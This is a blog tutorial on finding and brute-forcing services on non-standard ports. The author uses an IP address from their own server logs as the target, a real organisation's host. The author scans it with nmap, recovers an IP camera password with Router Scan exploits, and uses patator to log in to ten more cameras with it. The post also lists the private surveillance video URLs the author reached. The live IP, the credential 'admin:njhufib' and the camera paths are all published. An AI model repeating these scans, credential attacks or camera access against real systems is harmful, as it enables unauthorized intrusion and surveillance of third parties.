How to search and brute force services on non-standard ports

If you are wondering where I took the IP address that will participate in the examples of this article, then I took it from the access logs of the web server.

Someone, apparently, tried to brute-force the site:

HTTP Requests for DoS attack against the website:

193.232.100.234 - - [16/Mar/2019:01:52:24 +0300] "GET /D46D2B0F-C472-7F4D-9AB1-495B571532ED/init?url=https%3A%2F%2Fkali.tools%2Fall%2F%3Ftool%3D5&isTopLevel=true&nocache=11cc8 HTTP/1.0" 403 243 "https://kali.tools/all/?tool=5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" kali.tools
193.232.100.234 - - [16/Mar/2019:01:53:25 +0300] "GET /D46D2B0F-C472-7F4D-9AB1-495B571532ED/websocket?url=https%3A%2F%2Fkali.tools%2Fall%2F%3Ftool%3D5&nocache=1552690388964 HTTP/1.0" 403 248 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" kali.tools
193.232.100.234 - - [16/Mar/2019:01:53:25 +0300] "GET /D46D2B0F-C472-7F4D-9AB1-495B571532ED/init?url=https%3A%2F%2Fkali.tools%2Fall%2F%3Ftool%3D5&isTopLevel=true&nocache=1a774 HTTP/1.0" 403 243 "https://kali.tools/all/?tool=5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" kali.tools
193.232.100.234 - - [16/Mar/2019:01:53:26 +0300] "GET /D46D2B0F-C472-7F4D-9AB1-495B571532ED/websocket?url=https%3A%2F%2Fkali.tools%2Fall%2F%3Ftool%3D5&nocache=1552690389978 HTTP/1.0" 403 248 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" kali.tools
193.232.100.234 - - [16/Mar/2019:01:53:26 +0300] "GET /D46D2B0F-C472-7F4D-9AB1-495B571532ED/init?url=https%3A%2F%2Fkali.tools%2Fall%2F%3Ftool%3D5&isTopLevel=true&nocache=1f50e HTTP/1.0" 403 243 "https://kali.tools/all/?tool=5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" kali.tools
193.232.100.234 - - [16/Mar/2019:01:54:27 +0300] "GET /D46D2B0F-C472-7F4D-9AB1-495B571532ED/websocket?url=https%3A%2F%2Fkali.tools%2Fall%2F%3Ftool%3D5&nocache=1552690450965 HTTP/1.0" 403 248 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" kali.tools
193.232.100.234 - - [16/Mar/2019:01:54:27 +0300] "GET /D46D2B0F-C472-7F4D-9AB1-495B571532ED/init?url=https%3A%2F%2Fkali.tools%2Fall%2F%3Ftool%3D5&isTopLevel=true&nocache=1fcfa HTTP/1.0" 403 243 "https://kali.tools/all/?tool=5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" kali.tools
193.232.100.234 - - [16/Mar/2019:01:54:28 +0300] "GET /D46D2B0F-C472-7F4D-9AB1-495B571532ED/websocket?url=https%3A%2F%2Fkali.tools%2Fall%2F%3Ftool%3D5&nocache=1552690451964 HTTP/1.0" 403 248 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" kali.tools
193.232.100.234 - - [16/Mar/2019:01:54:28 +0300] "GET /D46D2B0F-C472-7F4D-9AB1-495B571532ED/init?url=https%3A%2F%2Fkali.tools%2Fall%2F%3Ftool%3D5&isTopLevel=true&nocache=1fc40 HTTP/1.0" 403 243 "https://kali.tools/all/?tool=5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" kali.tools
193.232.100.234 - - [16/Mar/2019:01:55:29 +0300] "GET /D46D2B0F-C472-7F4D-9AB1-495B571532ED/websocket?url=https%3A%2F%2Fkali.tools%2Fall%2F%3Ftool%3D5&nocache=1552690512973 HTTP/1.0" 403 248 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" kali.tools

I’m writing “apparently”, as I’m not completely sure – the hosting equipment itself does not let more than a few requests per second, and for the site long time ago this IP has been blocked by an automatic script for too many requests. That is, incoming requests for at least the last couple of weeks (the time access logs are stored) come and receive 403 errors in response – that is, they do not have any significant influence on the server load. That’s why I noticed this activity only a few weeks later.

Regardless of whether a program went mad or someone went mad, we have the IP address 193.232.100.234 and the moral right for our small investigation. But just a little. Right quite a bit. We will not even touch anything. Just see who it is, that’s all…

Let's try to get hostname by IP:

dig -x 193.232.100.234

And:

nslookup 193.232.100.234

Since there is no PTR record for this host, we have not received any data.

Sometimes results can be obtained by searching for sites on the same IP, as well as from Securitytrails.

The first service gave us a hostname:

  • lk.repropark.ru

Check that the host lk.repropark.ru is really bind to the IP address under investigation:

dig +short lk.repropark.ru
193.232.100.234

Securitytrails also led to lk.repropark.ru, and already this host told about the existence of the mailsrvnew.repropark.ru and meet.repropark.ru hosts.

So, there are hosts

  • lk.repropark.ru (193.232.100.234)
  • mailsrvnew.repropark.ru (IP is not installed at this time)
  • meet.repropark.ru (193.232.100.237)
  • repropark.ru (195.208.0.16)

Since this is a site of a factory (sort of), it turns out that the DoS attack was carried out either by:

a) someone else who has already hacked the servers of this organization and uses them for their own purposes

b) the system administrator of this company who went mad

How to define services on non-standard ports

Perform a full port scan along with a collection of service banners:

sudo nmap -p- -sV --script=banner 193.232.100.234

We get the following result:

 

Nmap scan report for 193.232.100.234
Host is up (0.092s latency).
Not shown: 65135 filtered ports, 354 closed ports
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           vsftpd 3.0.3
|_banner: 220 (vsFTPd 3.0.3)
22/tcp    open  ssh           OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
|_banner: SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u4
25/tcp    open  smtp?
| fingerprint-strings: 
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, LDAPSearchReq, RTSPRequest: 
|     452 syntax error (connecting)
|     syntax error (connecting)
|   Hello, Help, Kerberos, LPDString, SSLSessionReq, TLSSessionReq: 
|     452 syntax error (connecting)
|   SIPOptions: 
|     452 syntax error (connecting)
|     syntax error (connecting)
|     syntax error (connecting)
|     syntax error (connecting)
|_    many errors
80/tcp    open  http          Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
211/tcp   open  ftp           vsftpd 3.0.2
|_banner: 220 (vsFTPd 3.0.2)
212/tcp   open  ftp           Microsoft ftpd
|_banner: 220 Microsoft FTP Service
443/tcp   open  ssl/http      Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
1723/tcp  open  pptp          MikroTik (Firmware: 1)
5010/tcp  open  ssh           OpenSSH 6.0p1 Debian 4+deb7u3 (protocol 2.0)
|_banner: SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u3
5013/tcp  open  ssl/fmpro-v6?
5222/tcp  open  jabber        Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     compression_methods: 
| 
|     features: 
| 
|     stream_id: 6oytos41yv
|     unknown: 
| 
|     errors: 
|       invalid-namespace
|       (timeout)
|     xmpp: 
|       server name: chatsrv
|       version: 1.0
|     auth_mechanisms: 
| 
|_    capabilities: 
7211/tcp  open  ftp           vsftpd 3.0.2
|_banner: 220 (vsFTPd 3.0.2)
7443/tcp  open  ssl/http      Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
8000/tcp  open  ssh           OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
|_banner: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3
8880/tcp  open  http          Apache httpd 2.2.25 ((Win32))
|_http-server-header: Apache/2.2.25 (Win32)
9090/tcp  open  http          Jetty
9780/tcp  open  unknown
9786/tcp  open  http          Devline Line surveillance system httpd
|_http-server-header: Devline Linia Server
9977/tcp  open  http          Boa httpd
9978/tcp  open  http          Boa httpd
9979/tcp  open  http          Boa httpd
9980/tcp  open  http          Boa httpd
9981/tcp  open  http          Boa httpd
9982/tcp  open  http          Boa httpd
9983/tcp  open  http          Boa httpd
9984/tcp  open  http          Boa httpd
9985/tcp  open  http          Boa httpd
9986/tcp  open  http          Boa HTTPd 0.94.13
|_http-server-header: Boa/0.94.13
9987/tcp  open  http          Boa HTTPd 0.94.13
|_http-server-header: Boa/0.94.13
9988/tcp  open  http          Boa HTTPd 0.94.13
|_http-server-header: Boa/0.94.13
9989/tcp  open  http          Boa HTTPd 0.94.13
|_http-server-header: Boa/0.94.13
9990/tcp  open  http          Boa HTTPd 0.94.13
|_http-server-header: Boa/0.94.13
9991/tcp  open  http          Boa HTTPd 0.94.13
|_http-server-header: Boa/0.94.13
9992/tcp  open  http          Boa HTTPd 0.94.13
|_http-server-header: Boa/0.94.13
9993/tcp  open  http          lighttpd
|_http-server-header: dcs-lig-httpd
9994/tcp  open  http          lighttpd
|_http-server-header: dcs-lig-httpd
9995/tcp  open  http          lighttpd
|_http-server-header: dcs-lig-httpd
9996/tcp  open  http          Boa HTTPd 0.94.13
|_http-server-header: Boa/0.94.13
9997/tcp  open  http          Boa HTTPd 0.94.13
|_http-server-header: Boa/0.94.13
9998/tcp  open  http          lighttpd (D-Link DCS IP camera)
|_http-server-header: dcs-lig-httpd
17789/tcp open  ssh           OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0)
|_banner: SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u4
19777/tcp open  ssl/unknown
19781/tcp open  ssl/unknown
19782/tcp open  ssl/unknown
19887/tcp open  ssl/unknown
19889/tcp open  ssl/unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.70%I=7%D=3/17%Time=5C8E6552%P=x86_64-unknown-linux-gnu%r
SF:(Hello,1F,"452\x20syntax\x20error\x20\(connecting\)\r\n")%r(Help,1F,"45
SF:2\x20syntax\x20error\x20\(connecting\)\r\n")%r(GenericLines,3E,"452\x20
SF:syntax\x20error\x20\(connecting\)\r\n452\x20syntax\x20error\x20\(connec
SF:ting\)\r\n")%r(GetRequest,3E,"452\x20syntax\x20error\x20\(connecting\)\
SF:r\n452\x20syntax\x20error\x20\(connecting\)\r\n")%r(HTTPOptions,3E,"452
SF:\x20syntax\x20error\x20\(connecting\)\r\n452\x20syntax\x20error\x20\(co
SF:nnecting\)\r\n")%r(RTSPRequest,3E,"452\x20syntax\x20error\x20\(connecti
SF:ng\)\r\n452\x20syntax\x20error\x20\(connecting\)\r\n")%r(SSLSessionReq,
SF:1F,"452\x20syntax\x20error\x20\(connecting\)\r\n")%r(TLSSessionReq,1F,"
SF:452\x20syntax\x20error\x20\(connecting\)\r\n")%r(Kerberos,1F,"452\x20sy
SF:ntax\x20error\x20\(connecting\)\r\n")%r(FourOhFourRequest,3E,"452\x20sy
SF:ntax\x20error\x20\(connecting\)\r\n452\x20syntax\x20error\x20\(connecti
SF:ng\)\r\n")%r(LPDString,1F,"452\x20syntax\x20error\x20\(connecting\)\r\n
SF:")%r(LDAPSearchReq,3E,"452\x20syntax\x20error\x20\(connecting\)\r\n452\
SF:x20syntax\x20error\x20\(connecting\)\r\n")%r(SIPOptions,91,"452\x20synt
SF:ax\x20error\x20\(connecting\)\r\n452\x20syntax\x20error\x20\(connecting
SF:\)\r\n452\x20syntax\x20error\x20\(connecting\)\r\n452\x20syntax\x20erro
SF:r\x20\(connecting\)\r\n421\x20too\x20many\x20errors\r\n");
Service Info: Host: MikroTik; OSs: Unix, Linux, Windows; Devices: security-misc, webcam; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1000.83 seconds

Not a host, but some kind of Christmas tree! There is:

  • 2 or 3 web servers (ports 80, 443 (HTTPS), 8880 and 7443 (also HTTPS))
  • 4 SSH servers (ports 22, 5010, 8000 and 17789)
  • 4 FTP servers (ports 21, 211, 212, 7211)
  • Openfire, Version: 4.0.3 on port 9090
  • HTTP server on port 9780 that did not accept any connection attempts
  • HTTP server on port 9786, which offers to download the Flash player, judging by the file http://193.232.100.234:9786/lang.json (found based on the analysis of the source code), is related to the video surveillance system ru.devline.tv (Devline Linia Server (Devline))
  • Many Boa and lighttpd HTTP servers on ports 9977, 9978, 9979, 9980, 9981 9982, 9983, 9984, 9985, 9986, 9987, 9988, 9989, 9990, 9991, 9992, 9993, 9994, 9995, 9996, 9997 and 9998

I googled – Boa is a simple HTTP server for hardware like webcams.

For port 9998, it is written that this is a D-Link DCS IP camera.

There are some quite incomprehensible ports.

Apparently, this is a router or a computer on which port forwarding is anabled to other devices located on the local network is configured.

How to use Router Scan by Stas’M on non-standard ports

The equipment on ports 9977, 9978, 9979, 9980, 9981 9982, 9983, 9984, 9985, 9986, 9987, 9988, 9989, 9990, 9991, 9992, 9993, 9994, 9995, 9996, 9997 and 9998 is some sort of appliances like routers or IP cameras.

To check them, you can use RouterSploit or Router Scan by Stas’M.

By default, Router Scan scans three popular web ports 80, 8080 and 1080. But in our case, all the ports are different, so I need to change the port settings. This can be done in the GUI or (which is faster if there are many ports), in the ports.txt file, which lies in the root folder of the Router Scan, enter the required ports – one port per line.

Run the scan:

For the three devices, the exploits is workable and we know their username and password: admin:njhufib

I looked – this is really an IP camera.

There is no njhufib password in the Router Scan dictionary, so even if other devices for which there was no working exploit have the same password, Router Scan cannot verify this.

How to brut-force services on non-standard ports

To check whether the found credentials are suitable for devices on other ports, we will use the wonderful program for bruteforce, its is patator.

In the options we will need to specify the type of authentication, so to start we need to find it out. This can be done with a command like:

curl -v HOST:PORT

In the results of which you need to look at the headers.

For example:

curl -v 193.232.100.234:9977

Displays:

*   Trying 193.232.100.234...
* TCP_NODELAY set
* Connected to 193.232.100.234 (193.232.100.234) port 9977 (#0)
> GET / HTTP/1.1
> Host: 193.232.100.234:9977
> User-Agent: curl/7.64.0
> Accept: */*
> 
* HTTP 1.0, assume close after body
< HTTP/1.0 401 Unauthorized
< Date: Tue, 19 Mar 2019 04:34:45 GMT
< Connection: close
< WWW-Authenticate: Basic realm="DCS-2103"
< Content-Length: 0
< Content-Type: text/html; charset=ISO-8859-1
< 
* Closing connection 0

We look at the line containing WWW-Authenticate: Basic – so, Basic authentication is used.

In case of a failed login, an error code of 401 (Unauthorized) is returned.

We compose the command:

patator http_fuzz url=http://193.232.100.234:FILE0 0=ports.txt auth_type=basic user_pass=admin:njhufib -x ignore:code=401 -x ignore,retry:code=500

Where:

  • http_fuzz – means to use the http_fuzz module, which is used for brute-force the basic | digest | ntlm authentication, brute-force web authentication, search for hidden files and folders. Perhaps it can still be used for anything – the patator is a super flexible program.
  • url=http://193.232.100.234:FILE0 – means that the URL is the http://193.232.100.234: string, after which (as we see, after a colon), the values from file 0 (FILE0) are substituted. If you forget, ports are indicated through a colon, that is, the same IP address will be taken as a host, but with different ports
  • 0=ports.txt – means that the file with the number 0 is named ports.txt. I recall that the data from this file are substituted as ports. I just borrowed the ports.txt file from Router Scan.
  • auth_type=basic – Basic is set as the authentication method
  • user_pass=admin:njhufib – specifies the username and password, I use a static pair of admin:njhufib
  • -x ignore:code=401 – means to ignore (not display) attempts for which the error code was 401 (Access denied)
  • -x ignore,retry:code=500 – means to ignore (not to display) attempts for which the error code was 500 (a problem on the server), but at the same time try the same login and password again.

We get:

 

07:35:23 patator    INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-03-19 07:35 MSK
07:35:23 patator    INFO -                                                                              
07:35:23 patator    INFO - code size:clen       time | candidate                          |   num | mesg
07:35:23 patator    INFO - -----------------------------------------------------------------------------
07:35:23 patator    INFO - 200  2855:2727      0.242 | 9983                               |     7 | HTTP/1.1 200 OK
07:35:23 patator    INFO - 200  2855:2727      0.239 | 9984                               |     8 | HTTP/1.1 200 OK
07:35:24 patator    INFO - 200  2785:2657      0.250 | 9990                               |    14 | HTTP/1.1 200 OK
07:35:24 patator    INFO - 200  2785:2657      0.227 | 9991                               |    15 | HTTP/1.1 200 OK
07:35:24 patator    INFO - 200  2785:2657      0.227 | 9992                               |    16 | HTTP/1.1 200 OK
07:35:24 patator    INFO - 200  2593:2378      0.233 | 9993                               |    17 | HTTP/1.1 200 OK
07:35:24 patator    INFO - 200  2591:2378      0.232 | 9994                               |    18 | HTTP/1.1 200 OK
07:35:24 patator    INFO - 200  2593:2378      0.232 | 9995                               |    19 | HTTP/1.1 200 OK
07:35:24 patator    INFO - 200  2785:2657      0.235 | 9997                               |    21 | HTTP/1.1 200 OK
07:35:24 patator    INFO - 200  2593:2378      0.239 | 9998                               |    22 | HTTP/1.1 200 OK
07:35:25 patator    INFO - Hits/Done/Skip/Fail/Size: 10/22/0/0/22, Avg: 10 r/s, Time: 0h 0m 2s

We look at the candidate column – this pair of passwords successfully approached another ten hosts on other ports:

  • 9983
  • 9984
  • 9990
  • 9991
  • 9992
  • 9993
  • 9994
  • 9995
  • 9997
  • 9998

By inertia, almost reflexively, I began to clear the ports.txt file from the ports of those hosts for whom the passwords are already known, in order to start brute force in the dictionary for the remaining 12 ports – but then I reminded myself, we were only going to look – who this. And I did not do that. But it is not necessary to see video from all IP cameras of this organization…

How to open Devline Linia Server (Devline) without Flash

There were some problems with http://193.232.100.234:9786/ - I couldn’t find a web browser that still supports Flash … (I run Linux). I guessed to start a virtual machine with Windows and opened this address in Internet Explorer, this is what Devline Linia Server (Devline) looks like:

You may ask, what kind of password you need to enter – you do not need to enter a password… Just open the address and see… Perhaps it was intended …

User is web, password - <blank line>. To make it easier for the boss to remember?

IT department – perhaps from here a DoS attack was carried out…

Since Flash is a rather ancient technology, there is a chance that the Flash application is quite simple and you can get access to cameras without an Internet Explorer browser. You can decompile the file with Flash, but, in my opinion, it is even easier to understand the principles of its work by analysis of network activity.

Analysis of Flash application network activity

Already probably not even everyone will understand what Flash is. This is a powerful technology that greatly expanded the capabilities of web browsers in the past, and it was very popular. And now, due to the lack of support in browsers, it is almost forgotten. Therefore, quite briefly about the analysis of Flash applications in Wireshark.

Since Flash works in a browser, this program sends regular HTTP requests. For analysis, it is enough to capture traffic and use the filter in Wireshark:

http

By the way, see "Wireshark Filters".

There it turned out everything is trivially simple – requests are made to addresses of the form:

  • http://193.232.100.234:9786/cameras
  • http://193.232.100.234:9786/microphones
  • http://193.232.100.234:9786/users/web

Basic authentication is used there.

The returned XML document contains relative links to videos and photos, for example, http://193.232.100.234:9786/cameras/2/video, http://193.232.100.234:9786/cameras/23/video, and so on.

Why Flash here if everything could be done using JavaScript and HTML5 technology? Apparently, the front-end was written about fifteen years ago and the developer who did it, quited and now no one can remake… The devline company itself, judging from the price list on the official website, is alive.

Conclusion

And, perhaps, enough with them. Why one of the factory employees has run DoS attack against my website? I do not know. Apparently, he has too much free time at work.

Surveillance cameras or specially assembled in a hub and displayed for open access, or configured as something really quite deliberately wrong – you don’t need not only a password, you don’t even need to enter a username to view them – perhaps this is done for everyone to see which a perfect factory exists…

Well, in this article we learned how to find and define services, even if they work on unusual ports. We learned how to work with Router Scan by Stas'M and patator on non-standard ports. Considered the analysis of network activity of a very simple application.

Recommended for you:

One Comment to How to search and brute force services on non-standard ports

  1. johndoe says:

    Hi Alex,

     

    https://miloserdov.org/?p=2287 is not accesssible

Leave a Reply

Your email address will not be published. Required fields are marked *